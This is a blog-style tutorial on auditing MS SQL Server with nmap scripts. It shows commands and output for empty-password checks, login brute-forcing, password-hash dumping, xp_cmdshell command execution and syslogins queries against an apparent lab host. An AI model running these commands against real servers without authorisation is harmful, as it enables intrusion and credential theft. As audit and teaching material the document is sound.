Control MS SQL Server security with nmap
At nmap there are many valuable scripts to control the secuirty MS SQL server database. at this note I will show you how you can audit your SQL server with nmap
Check sa account with null password
ms-sql-empty-password
Attempts to authenticate to Microsoft SQL Servers using an empty password for the sysadmin (sa) account.
One example
nmap -p 1433 –script ms-sql-empty-password 192.200.11.11
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 12:41 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00064s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-empty-password:
| [192.200.11.11:1433]
|_ sa:<empty> => Login Success
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) scanned in 17.5
If port 445 ( microsoft-ds service ) is open
nmap -p 445 –script ms-sql-empty-password –script-args mssql.instance-all 192.200.11.11
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 12:44 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00059s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Host script results:
| ms-sql-empty-password:
| [192.200.11.11:1433]
Brute Force attacks
nmap -p1433 –script ms-sql-brute 192.200.11.11
Host is up, received arp-response (0.00064s latency).
Scanned at 2016-06-12 12:20:41 EDT for 157s
PORT STATE SERVICE REASON
1433/tcp open ms-sql-s syn-ack ttl 128
| ms-sql-brute:
| [192.200.11.11:1433]
|_ No credentials found
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Final times for host: srtt: 636 rttvar: 3138 to: 100000
Dumping the password hashes of an MS SQL server
If sa password is null
nmap -p1433 –script ms-sql-empty-password,ms-sql-dump-hashes 192.200.11.11
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 05:03 EDT
Nmap scan report for 192.200.11.11
Host is up (0.016s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-dump-hashes:
| [192.200.11.11:1433]
| sa:0x0200EC357FC5FA85256C4BC37667845B81E84C0F3CA9E7AD2BC7FB94FB698E5243FC5112C2B240884C44E71FD45195BB60B4AAF63D24B909C5945285793D0605E4D09E886849
| ##MS_PolicyTsqlExecutionLogin##:0x0200251457811E7CB37A8C9746EC742325673A60D16B98DF182FCF7E4410A2FB1B03C36B2E60A68BB269C7D47B3C43F6CB485365CF5D171A48171B6DA6DB74CDEA40759E9DFC
| ##MS_PolicyEventProcessingLogin##:0x0200F8A9BBBADB33E242C190EE82D15BB47564F46C5BF7B29B0124F32DCFF96837F9F243BD054F0A0D2B8D5C4D95F885B30EAA47F94F7FBBD3EA613DF64F05E14659742EB868
Getting Information
Attempts to determine configuration and version information for Microsoft SQL Server instances.
No credentials are required
nmap -p1433-1900 –script ms-sql-info 192.200.11.11
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-12 11:55 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00096s latency).
Not shown: 467 closed ports
PORT STATE SERVICE
1433/tcp open ms-sql-s
MAC Address: 08:00:27:37:86:AC (Cadmus Computer Systems)
Host script results:
| ms-sql-info:
| 192.200.11.11:1433:
| Version:
| number: 11.00.3128.00
| Post-SP patches applied: true
| Service pack level: SP1
| Product: Microsoft SQL Server 2012
| name: Microsoft SQL Server 2012 SP1+
|_ TCP port: 1433
Running command shell on MS SQL servers
To run dir command on windows server , if the sa account password is null,
nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=sa,mssql.password=”,ms-sql-xp-cmdshell.cmd=”dir” 192.200.11.11
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 05:38 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00046s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-xp-cmdshell:
| [192.200.11.11:1433]
| Command: dir
| output
| ======
| Volume in drive C has no label.
| Volume Serial Number is 1E1E-6DAB
| Null
| Directory of C:\Windows\system32
| Null
| 19/06/2016 01:51 <DIR> .
| 19/06/2016 01:51 <DIR> ..
| 30/09/2013 16:44 <DIR> 0409
| 02/01/2016 12:33 <DIR> 1033
| 18/06/2013 07:48 160 @OpenWithToastLogo.png
| 18/06/2013 08:04 120 @TileEmpty1x1Image.png
| 22/08/2013 03:39 3,812,352 accessibilitycpl.dll
| 22/08/2013 04:45 39,424 ACCTRES.dll
Running SQL Query
Runs a query against Microsoft SQL Server (ms-sql).
nmap -p 1433 –script ms-sql-query –script-args mssql.username=sa,mssql.password=”,ms-sql-query.query=”SELECT * FROM syslogins” 192.200.11.11
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-19 06:02 EDT
Nmap scan report for 192.200.11.11
Host is up (0.00060s latency).
PORT STATE SERVICE
1433/tcp open ms-sql-s
| ms-sql-query:
| [192.200.11.11:1433]
| Query: SELECT * FROM syslogins
| sid status createdate updatedate accdate totcpu totio spacelimit timelimit resultlimit name dbname password language denylogin hasaccess isntname isntgroup isntuser sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin loginname
| === ====== ========== ========== ======= ====== ===== ========== ========= =========== ==== ====== ======== ======== ========= ========= ======== ========= ======== ======== ============= =========== ========== ============ ========= ========= ========= =========
| 0x01 9 Apr 08, 2003 14:10:35 Jun 12, 2016 14:50:31 Apr 08, 2003 14:10:35 0 0 0 00sa master \x02\xEC\x7F\xFA%Kv\x84\x81L<\xE7+\xFB\xFB\x8ECQ\xC2@L\xE7\xD4\x95`\xAA=\xB9\xC5Ry\x06\xE4\x9Eh us_english0 1 0 0 0 1 0 0 0 0 0 0 0 sa
| 0x0106000000000009010000005FB6DAC7F7DB546D706711B128B5063888B01770 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLResourceSigningCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLResourceSigningCertificate##
| 0x010600000000000901000000A0B7FCD6F6D5FA771521910A3B71A750568D6275 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLReplicationSigningCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLReplicationSigningCertificate##
| 0x010600000000000901000000C2FB1C6E4485BB1056EBC85FD2CC2AD081390316 10 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 Jan 02, 2016 16:48:06 0 0 0 0 0 ##MS_SQLAuthenticatorCertificate## master Null Null 0 0 0 0 0 0 0 0 0 0 0 0 0##MS_SQLAuthenticatorCertificate##
Reply